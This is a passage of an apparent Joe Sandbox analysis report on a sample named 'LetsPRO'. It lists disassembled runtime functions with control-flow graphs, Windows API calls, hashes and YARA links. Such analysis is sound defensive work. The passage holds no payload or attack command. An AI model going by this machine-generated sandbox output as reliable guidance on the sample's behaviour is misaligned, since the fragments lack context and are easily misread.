                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6C93BED5), ref: 6C94A538
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A53B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                        • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                        • API String ID: 1483908321-2643937717
                                        • Opcode ID: 7ce215876474b9e98f47460d755bafd5eaabba81e7b73b341819464a09d76042
                                        • Instruction ID: 3de86b0d068dfa365cffa8550e1652be310eba7d68490bcdb9fc204ea27ad743
                                        • Opcode Fuzzy Hash: 7ce215876474b9e98f47460d755bafd5eaabba81e7b73b341819464a09d76042
                                        • Instruction Fuzzy Hash: 095136B1B053456A9F1C9BF69C55C3F3AADEFC5284360883AE815C3A40EF35D401DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94F945 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 319COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 865 6c94f945-6c94f973 866 6c94f975-6c94f98c call 6c90aaee call 6c900845 call 6c97b066 865->866 867 6c94f991-6c94f993 865->867 891 6c94fd9a 866->891 867->866 869 6c94f995-6c94f9a4 _mbspbrk 867->869 871 6c94f9a6-6c94f9b7 call 6c900845 call 6c90aaee 869->871 872 6c94f9bc-6c94f9c0 869->872 871->891 874 6c94f9c2-6c94f9c6 872->874 875 6c94f9dc call 6c917c06 872->875 878 6c94f9cd-6c94f9da _mbctolower 874->878 879 6c94f9c8-6c94f9cb 874->879 883 6c94f9e1-6c94fa02 FindFirstFileExA 875->883 878->883 879->871 879->878 886 6c94fae8-6c94faf2 883->886 887 6c94fa08-6c94fa1d _mbspbrk 883->887 889 6c94faf4-6c94fafe 886->889 890 6c94fb63-6c94fb69 886->890 887->871 892 6c94fa1f-6c94fa3f call 6c94f8e5 887->892 889->890 894 6c94fb00-6c94fb10 889->894 896 6c94fb7b-6c94fb91 FileTimeToLocalFileTime 890->896 897 6c94fb6b-6c94fb71 890->897 893 6c94fd9d-6c94fdab call 6c900837 891->893 910 6c94fa45-6c94fa4f call 6c8f2900 892->910 911 6c94facb-6c94fad1 892->911 902 6c94fb17-6c94fb2d call 6c977b0e 894->902 903 6c94fb12 894->903 900 6c94fb97-6c94fbad FileTimeToSystemTime 896->900 901 6c94fd81-6c94fd94 GetLastError call 6c90aaff FindClose 896->901 897->896 898 6c94fb73-6c94fb79 897->898 905 6c94fbf3-6c94fbf9 898->905 900->901 907 6c94fbb3-6c94fbf0 call 6c95a099 900->907 901->891 902->871 922 6c94fb33-6c94fb3a 902->922 903->902 914 6c94fc11-6c94fc27 FileTimeToLocalFileTime 905->914 915 6c94fbfb-6c94fc01 905->915 907->905 926 6c94fa51-6c94fa58 call 6c94fdac 910->926 927 6c94fa5a-6c94fa64 GetDriveTypeA 910->927 911->871 918 6c94fad7-6c94fae3 call 6c90017e 911->918 914->901 923 6c94fc2d-6c94fc43 FileTimeToSystemTime 914->923 915->914 921 6c94fc03-6c94fc0f 915->921 918->871 928 6c94fc89-6c94fc8f 921->928 922->871 929 6c94fb40-6c94fb5e call 6c977eb4 call 6c90a76b 922->929 923->901 930 6c94fc49-6c94fc86 call 6c95a099 923->930 926->911 926->927 927->911 932 6c94fa66-6c94fa6c 927->932 935 6c94fca7-6c94fcbd FileTimeToLocalFileTime 928->935 936 6c94fc91-6c94fc97 928->936 929->893 930->928 940 6c94fa6e-6c94fa79 call 6c90017e 932->940 941 6c94fa7a-6c94fac6 call 6c95a099 932->941 935->901 938 6c94fcc3-6c94fcd9 FileTimeToSystemTime 935->938 936->935 937 6c94fc99-6c94fca5 936->937 944 6c94fd1f-6c94fd25 FindClose 937->944 938->901 945 6c94fcdf-6c94fd1c call 6c95a099 938->945 940->941 950 6c94fd2b-6c94fd53 call 6c94ef77 941->950 944->950 945->944 957 6c94fd55-6c94fd5c 950->957 958 6c94fd5f-6c94fd7f 950->958 957->958 958->893
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94F975
                                        • _errno.MSVCR100 ref: 6C94F97C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94F987
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94F99B
                                        • _errno.MSVCR100 ref: 6C94F9A6
                                        • __doserrno.MSVCR100 ref: 6C94F9B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 1b79e651e558ee191d07d873ac4ea6ed8d67437feda1415b3b3a714ce85a4f9f
                                        • Instruction ID: 852db9ef706e7e55e4656b06c9e9110a546aba74b4489ad8bce2913dc8ccb75c
                                        • Opcode Fuzzy Hash: 1b79e651e558ee191d07d873ac4ea6ed8d67437feda1415b3b3a714ce85a4f9f
                                        • Instruction Fuzzy Hash: 40C1A7B1D0166AAEDB209F65CC44BE9B7FCBF19319F10429AE518D2940E734DAC4CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94F48B Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 319COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 773 6c94f48b-6c94f4b3 774 6c94f4b5-6c94f4cc call 6c90aaee call 6c900845 call 6c97b066 773->774 775 6c94f4d1-6c94f4d3 773->775 799 6c94f8d3 774->799 775->774 777 6c94f4d5-6c94f4e4 _mbspbrk 775->777 779 6c94f4e6-6c94f4f7 call 6c900845 call 6c90aaee 777->779 780 6c94f4fc-6c94f500 777->780 779->799 782 6c94f502-6c94f506 780->782 783 6c94f51c call 6c917c06 780->783 786 6c94f50d-6c94f51a _mbctolower 782->786 787 6c94f508-6c94f50b 782->787 791 6c94f521-6c94f542 FindFirstFileExA 783->791 786->791 787->779 787->786 794 6c94f628-6c94f632 791->794 795 6c94f548-6c94f55d _mbspbrk 791->795 797 6c94f634-6c94f63e 794->797 798 6c94f6a3-6c94f6a9 794->798 795->779 800 6c94f55f-6c94f57f call 6c94f8e5 795->800 797->798 801 6c94f640-6c94f650 797->801 804 6c94f6bb-6c94f6d1 FileTimeToLocalFileTime 798->804 805 6c94f6ab-6c94f6b1 798->805 803 6c94f8d6-6c94f8e4 call 6c900837 799->803 818 6c94f585-6c94f58f call 6c8f2900 800->818 819 6c94f60b-6c94f611 800->819 809 6c94f657-6c94f66d call 6c977b0e 801->809 810 6c94f652 801->810 807 6c94f6d7-6c94f6ed FileTimeToSystemTime 804->807 808 6c94f8ba-6c94f8cd GetLastError call 6c90aaff FindClose 804->808 805->804 806 6c94f6b3-6c94f6b9 805->806 814 6c94f733-6c94f739 806->814 807->808 815 6c94f6f3-6c94f730 call 6c95a099 807->815 808->799 809->779 830 6c94f673-6c94f67a 809->830 810->809 822 6c94f751-6c94f767 FileTimeToLocalFileTime 814->822 823 6c94f73b-6c94f741 814->823 815->814 834 6c94f591-6c94f598 call 6c94fdac 818->834 835 6c94f59a-6c94f5a4 GetDriveTypeA 818->835 819->779 826 6c94f617-6c94f623 call 6c90017e 819->826 822->808 831 6c94f76d-6c94f783 FileTimeToSystemTime 822->831 823->822 829 6c94f743-6c94f74f 823->829 826->779 836 6c94f7c9-6c94f7cf 829->836 830->779 837 6c94f680-6c94f69e call 6c977b2e call 6c90a76b 830->837 831->808 838 6c94f789-6c94f7c6 call 6c95a099 831->838 834->819 834->835 835->819 840 6c94f5a6-6c94f5ac 835->840 843 6c94f7e7-6c94f7fd FileTimeToLocalFileTime 836->843 844 6c94f7d1-6c94f7d7 836->844 837->803 838->836 848 6c94f5ae-6c94f5b9 call 6c90017e 840->848 849 6c94f5ba-6c94f606 call 6c95a099 840->849 843->808 846 6c94f803-6c94f819 FileTimeToSystemTime 843->846 844->843 845 6c94f7d9-6c94f7e5 844->845 852 6c94f85f-6c94f865 FindClose 845->852 846->808 853 6c94f81f-6c94f85c call 6c95a099 846->853 848->849 858 6c94f86b-6c94f8b8 call 6c94ef77 849->858 852->858 853->852 858->803
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94F4B5
                                        • _errno.MSVCR100 ref: 6C94F4BC
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94F4C7
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94F4DB
                                        • _errno.MSVCR100 ref: 6C94F4E6
                                        • __doserrno.MSVCR100 ref: 6C94F4F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 3368d05f5214279f0dfa81eecfaca912076103b8c94d68d5ce929b88617cf81f
                                        • Instruction ID: bb0ca9189b9d56a54deab91df0cd56649c0f3045c5156dbdb652f0b6741865fb
                                        • Opcode Fuzzy Hash: 3368d05f5214279f0dfa81eecfaca912076103b8c94d68d5ce929b88617cf81f
                                        • Instruction Fuzzy Hash: FCC1A7B190562AAEDB20DF65CC44AE9B7FCFF19319F1082EAE518D2A40E734D984CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94FE26 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 305COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1053 6c94fe26-6c94fe4e 1054 6c94fe50-6c94fe67 call 6c90aaee call 6c900845 call 6c97b066 1053->1054 1055 6c94fe6c-6c94fe6e 1053->1055 1078 6c950241 1054->1078 1055->1054 1056 6c94fe70-6c94fe7f _mbspbrk 1055->1056 1058 6c94fe97-6c94fe9b 1056->1058 1059 6c94fe81-6c94fe92 call 6c900845 call 6c90aaee 1056->1059 1063 6c94feb7 call 6c917c06 1058->1063 1064 6c94fe9d-6c94fea1 1058->1064 1059->1078 1070 6c94febc-6c94fedd FindFirstFileExA 1063->1070 1068 6c94fea3-6c94fea6 1064->1068 1069 6c94fea8-6c94feb5 _mbctolower 1064->1069 1068->1059 1068->1069 1069->1070 1073 6c94ffb4-6c94ffbe 1070->1073 1074 6c94fee3-6c94fef8 _mbspbrk 1070->1074 1079 6c94ffc0-6c94ffca 1073->1079 1080 6c95002f-6c950035 1073->1080 1074->1059 1077 6c94fefa-6c94ff1a call 6c94f8e5 1074->1077 1094 6c94ff97-6c94ff9d 1077->1094 1095 6c94ff1c-6c94ff26 call 6c8f2900 1077->1095 1082 6c950244-6c950252 call 6c900837 1078->1082 1079->1080 1085 6c94ffcc-6c94ffdc 1079->1085 1083 6c950044-6c95005a FileTimeToLocalFileTime 1080->1083 1084 6c950037-6c95003d 1080->1084 1089 6c950060-6c950076 FileTimeToSystemTime 1083->1089 1090 6c950228-6c95023b GetLastError call 6c90aaff FindClose 1083->1090 1084->1083 1088 6c95003f-6c950042 1084->1088 1091 6c94ffe3-6c94fff9 call 6c977b0e 1085->1091 1092 6c94ffde 1085->1092 1097 6c9500b9-6c9500bf 1088->1097 1089->1090 1098 6c95007c-6c9500b6 call 6c9591eb 1089->1098 1090->1078 1091->1059 1112 6c94ffff-6c950006 1091->1112 1092->1091 1094->1059 1101 6c94ffa3-6c94ffaf call 6c90017e 1094->1101 1117 6c94ff31-6c94ff3b GetDriveTypeA 1095->1117 1118 6c94ff28-6c94ff2f call 6c94fdac 1095->1118 1104 6c9500c1-6c9500c7 1097->1104 1105 6c9500ce-6c9500e4 FileTimeToLocalFileTime 1097->1105 1098->1097 1101->1059 1104->1105 1111 6c9500c9-6c9500cc 1104->1111 1105->1090 1107 6c9500ea-6c950100 FileTimeToSystemTime 1105->1107 1107->1090 1115 6c950106-6c95013d call 6c9591eb 1107->1115 1113 6c950140-6c950149 1111->1113 1112->1059 1114 6c95000c-6c95002a call 6c978224 call 6c90a76b 1112->1114 1121 6c950158-6c95016e FileTimeToLocalFileTime 1113->1121 1122 6c95014b-6c950151 1113->1122 1114->1082 1115->1113 1117->1094 1124 6c94ff3d-6c94ff43 1117->1124 1118->1094 1118->1117 1121->1090 1128 6c950174-6c95018a FileTimeToSystemTime 1121->1128 1122->1121 1127 6c950153-6c950156 1122->1127 1130 6c94ff45-6c94ff50 call 6c90017e 1124->1130 1131 6c94ff51-6c94ff92 call 6c9591eb 1124->1131 1134 6c9501ca-6c9501d3 FindClose 1127->1134 1128->1090 1135 6c950190-6c9501c7 call 6c9591eb 1128->1135 1130->1131 1141 6c9501d9-6c950226 call 6c94ef77 1131->1141 1134->1141 1135->1134 1141->1082
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94FE50
                                        • _errno.MSVCR100 ref: 6C94FE57
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94FE62
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94FE76
                                        • _errno.MSVCR100 ref: 6C94FE81
                                        • __doserrno.MSVCR100 ref: 6C94FE8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 2e605423971ea4da627b5d81e9a0f28d49a724d796c74cfc9f7c3000b73b37d3
                                        • Instruction ID: 2ba61261a0197f41660cbfaa863822b272d66700f183bd249ceb091fb3563aff
                                        • Opcode Fuzzy Hash: 2e605423971ea4da627b5d81e9a0f28d49a724d796c74cfc9f7c3000b73b37d3
                                        • Instruction Fuzzy Hash: B2B1D7B19052699EDB20DF65CC48BEAB7BCAF19319F1042D6E518E2980E734CAD4CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9084A8 Relevance: 58.5, APIs: 32, Strings: 1, Instructions: 740COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1596 6c9084a8-6c9084c0 call 6c90075b 1599 6c9084c6-6c9084d0 1596->1599 1600 6c93181c 1596->1600 1601 6c9084d2-6c9084d5 1599->1601 1602 6c9084db-6c9084e3 1599->1602 1605 6c931828-6c931838 call 6c97f04a 1600->1605 1601->1602 1601->1605 1603 6c9084e5-6c9084e8 1602->1603 1604 6c9084ee-6c9084f2 1602->1604 1603->1604 1606 6c93183d-6c931841 1603->1606 1607 6c9084f4-6c9084f7 1604->1607 1608 6c9084fd-6c90850d GetUserDefaultLCID 1604->1608 1605->1602 1613 6c931843-6c931846 1606->1613 1614 6c931851-6c931853 call 6c97f52e 1606->1614 1607->1608 1610 6c93189d-6c9318c0 call 6c8f2900 EnumSystemLocalesA 1607->1610 1611 6c908510-6c908514 1608->1611 1610->1611 1628 6c9318c6-6c9318ca 1610->1628 1615 6c9085e8-6c9085ea 1611->1615 1616 6c90851a-6c908534 call 6c9085ec 1611->1616 1613->1614 1617 6c931848-6c93184f call 6c97f4c7 1613->1617 1620 6c931858-6c93185c 1614->1620 1622 6c9085e3-6c9085e7 1615->1622 1616->1615 1630 6c90853a-6c908540 1616->1630 1617->1620 1620->1616 1625 6c931862-6c931874 call 6c97f04a 1620->1625 1625->1611 1633 6c93187a-6c93187e 1625->1633 1628->1611 1630->1615 1632 6c908546-6c90854c 1630->1632 1632->1615 1634 6c908552-6c90855e IsValidCodePage 1632->1634 1635 6c931891-6c931898 call 6c97f52e 1633->1635 1636 6c931880-6c931883 1633->1636 1634->1615 1637 6c908564-6c908571 IsValidLocale 1634->1637 1635->1611 1636->1635 1638 6c931885-6c93188c call 6c97f4c7 1636->1638 1637->1615 1640 6c908573-6c908578 1637->1640 1638->1611 1643 6c90857a-6c908589 1640->1643 1644 6c90858d-6c908592 1640->1644 1643->1644 1646 6c9085e0-6c9085e2 1644->1646 1647 6c908594-6c9085a2 1644->1647 1646->1622 1648 6c9085a8-6c9085b7 GetLocaleInfoA 1647->1648 1649 6c9318cf-6c9318e1 call 6c9048f4 1647->1649 1648->1615 1650 6c9085b9-6c9085cb GetLocaleInfoA 1648->1650 1649->1650 1655 6c9318e7-6c9318e9 1649->1655 1650->1615 1652 6c9085cd-6c9085dd call 6c908480 1650->1652 1652->1646 1657 6c9318ee call 6c97b014 1655->1657 1658 6c9318f3-6c9318f8 1657->1658 1659 6c931931-6c931bba 1658->1659 1660 6c9318fa-6c93192f 1658->1660 1661 6c931c33-6c931c3f 1659->1661 1662 6c931bbc-6c931bd1 1659->1662 1660->1659 1664 6c931c45 1661->1664 1665 6c9121bd 1661->1665 1667 6c931bd3-6c931bd5 1662->1667 1668 6c931bdb-6c931be6 1662->1668 1669 6c931c47 call 6c900b61 1664->1669 1666 6c9121bf-6c9121c3 1665->1666 1667->1668 1670 6c911c7e-6c911c81 1667->1670 1671 6c911c90-6c911c92 1668->1671 1672 6c931c4c-6c931c54 1669->1672 1678 6c911c83-6c911c8e 1670->1678 1679 6c911c69-6c911c78 call 6c911c3d 1670->1679 1673 6c931c5a-6c931c62 1672->1673 1674 6c9121ce-6c9121d1 1672->1674 1676 6c912183-6c91218e 1673->1676 1677 6c931c68 1673->1677 1674->1666 1676->1674 1681 6c912190-6c9121a0 call 6c911c57 1676->1681 1680 6c931c6a call 6c900b61 1677->1680 1678->1671 1679->1670 1688 6c931bca-6c931bd1 1679->1688 1683 6c931c6f-6c931c77 1680->1683 1689 6c931c84-6c931c86 1681->1689 1690 6c9121a6-6c9121a9 1681->1690 1683->1674 1686 6c931c7d-6c931c7f 1683->1686 1686->1676 1688->1667 1688->1668 1689->1690 1691 6c931c8c-6c931c9a call 6c90017e 1689->1691 1692 6c931cd7-6c931cd9 1690->1692 1693 6c9121af-6c9121bb call 6c90017e 1690->1693 1702 6c931cb4-6c931cb6 1691->1702 1703 6c931c9c-6c931ca6 1691->1703 1694 6c931cdb 1692->1694 1695 6c931cdd-6c931ce2 1692->1695 1693->1665 1694->1695 1695->1674 1699 6c931ce8-6c931ced 1695->1699 1699->1674 1701 6c931cf3-6c931cf6 1699->1701 1704 6c931cfc call 6c976748 1701->1704 1706 6c931ca8-6c931cb1 1702->1706 1707 6c931cb8-6c931cbe 1702->1707 1705 6c931d21-6c931d24 1703->1705 1708 6c931d01-6c931d06 1704->1708 1709 6c931d93-6c931d96 1705->1709 1710 6c931d26-6c931d35 call 6c8f2900 1705->1710 1706->1702 1707->1705 1711 6c931cc0-6c931cc3 1707->1711 1708->1674 1712 6c931d0c-6c931d1a 1708->1712 1714 6c931da6-6c931da9 1709->1714 1715 6c931d98-6c931da4 call 6c90017e 1709->1715 1722 6c931d36 call 6c901e4c 1710->1722 1716 6c931cc9 call 6c976748 1711->1716 1717 6c931d1c 1712->1717 1714->1666 1715->1714 1720 6c931cce-6c931cd3 1716->1720 1717->1705 1720->1717 1721 6c931cd5 1720->1721 1721->1705 1724 6c931d3b-6c931d41 1722->1724 1724->1709 1725 6c931d43-6c931d5a call 6c8f2900 call 6c9048f4 1724->1725 1730 6c931dae 1725->1730 1731 6c931d5c-6c931d7b SetEnvironmentVariableA 1725->1731 1732 6c931db3 call 6c97b014 1730->1732 1733 6c931d7d-6c931d86 call 6c900845 1731->1733 1734 6c931d8c-6c931d92 call 6c90017e 1731->1734 1735 6c931db8-6c931dbe call 6c94cd6e 1732->1735 1733->1734 1734->1709
                                        APIs
                                        • _getptd.MSVCR100(00000083,00000001,000000BC,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9084B0
                                        • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908504
                                        • IsValidCodePage.KERNEL32(00000000,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908556
                                        • IsValidLocale.KERNEL32(?,00000001,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908569
                                        • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9085B3
                                        • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6C9085C7
                                        • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6C9085D8
                                        • _TranslateName.LIBCMT ref: 6C931830
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
                                        • String ID: Norwegian-Nynorsk
                                        • API String ID: 3958957854-461349085
                                        • Opcode ID: 778a930e6bf70bd9feef4b14d0d53b35104d1fdb49315844aa06fa854d8072f2
                                        • Instruction ID: 0c7f5437ff8914b137e0d39ce32219135242426ccaefa1cdcc32f9db0959274c
                                        • Opcode Fuzzy Hash: 778a930e6bf70bd9feef4b14d0d53b35104d1fdb49315844aa06fa854d8072f2
                                        • Instruction Fuzzy Hash: 07224A7068C6955FE7028E698CC4AAA3F68DF0321CB0546FFD9998B9D3C724D847C692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C950BF3 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 320COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1841 6c950bf3-6c950c1b 1842 6c950c1d-6c950c34 call 6c90aaee call 6c900845 call 6c97b066 1841->1842 1843 6c950c39-6c950c3b 1841->1843 1864 6c951042 1842->1864 1843->1842 1845 6c950c3d-6c950c4c call 6c900eef 1843->1845 1850 6c950c64-6c950c69 1845->1850 1851 6c950c4e-6c950c5f call 6c900845 call 6c90aaee 1845->1851 1854 6c950c88 call 6c917c06 1850->1854 1855 6c950c6b-6c950c71 1850->1855 1851->1864 1863 6c950c8d-6c950cae FindFirstFileExW 1854->1863 1858 6c950c73-6c950c77 1855->1858 1859 6c950c79-6c950c86 towlower 1855->1859 1858->1851 1858->1859 1859->1863 1867 6c950cb4-6c950cc9 call 6c900eef 1863->1867 1868 6c950d97-6c950da1 1863->1868 1865 6c951045-6c951053 call 6c900837 1864->1865 1867->1851 1883 6c950ccb-6c950ceb call 6c917dba 1867->1883 1870 6c950da3-6c950dad 1868->1870 1871 6c950e12-6c950e18 1868->1871 1870->1871 1876 6c950daf-6c950dbf 1870->1876 1873 6c950e2a-6c950e40 FileTimeToLocalFileTime 1871->1873 1874 6c950e1a-6c950e20 1871->1874 1879 6c950e46-6c950e5c FileTimeToSystemTime 1873->1879 1880 6c951029-6c95103c GetLastError call 6c90aaff FindClose 1873->1880 1874->1873 1878 6c950e22-6c950e28 1874->1878 1881 6c950dc6-6c950ddc call 6c90af5c 1876->1881 1882 6c950dc1 1876->1882 1885 6c950ea2-6c950ea8 1878->1885 1879->1880 1886 6c950e62-6c950e9f call 6c95a099 1879->1886 1880->1864 1881->1851 1899 6c950de2-6c950de9 1881->1899 1882->1881 1895 6c950cf1-6c950cfb call 6c90221c 1883->1895 1896 6c950d7a-6c950d80 1883->1896 1891 6c950ec0-6c950ed6 FileTimeToLocalFileTime 1885->1891 1892 6c950eaa-6c950eb0 1885->1892 1886->1885 1891->1880 1900 6c950edc-6c950ef2 FileTimeToSystemTime 1891->1900 1892->1891 1898 6c950eb2-6c950ebe 1892->1898 1916 6c950d06-6c950d10 GetDriveTypeW 1895->1916 1917 6c950cfd-6c950d04 call 6c917c87 1895->1917 1896->1851 1901 6c950d86-6c950d92 call 6c90017e 1896->1901 1903 6c950f38-6c950f3e 1898->1903 1899->1851 1904 6c950def-6c950e0d call 6c977b2e call 6c90a76b 1899->1904 1900->1880 1905 6c950ef8-6c950f35 call 6c95a099 1900->1905 1901->1851 1907 6c950f56-6c950f6c FileTimeToLocalFileTime 1903->1907 1908 6c950f40-6c950f46 1903->1908 1904->1865 1905->1903 1907->1880 1915 6c950f72-6c950f88 FileTimeToSystemTime 1907->1915 1908->1907 1914 6c950f48-6c950f54 1908->1914 1919 6c950fce-6c950fd4 FindClose 1914->1919 1915->1880 1920 6c950f8e-6c950fcb call 6c95a099 1915->1920 1916->1896 1922 6c950d12-6c950d18 1916->1922 1917->1896 1917->1916 1927 6c950fda-6c951027 call 6c9506c1 1919->1927 1920->1919 1928 6c950d26-6c950d75 call 6c95a099 1922->1928 1929 6c950d1a-6c950d25 call 6c90017e 1922->1929 1927->1865 1928->1927 1929->1928
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C950C1D
                                        • _errno.MSVCR100 ref: 6C950C24
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C950C2F
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C950C43
                                        • _errno.MSVCR100 ref: 6C950C4E
                                        • __doserrno.MSVCR100 ref: 6C950C58
                                        Strings
                                        Memory Dump Source
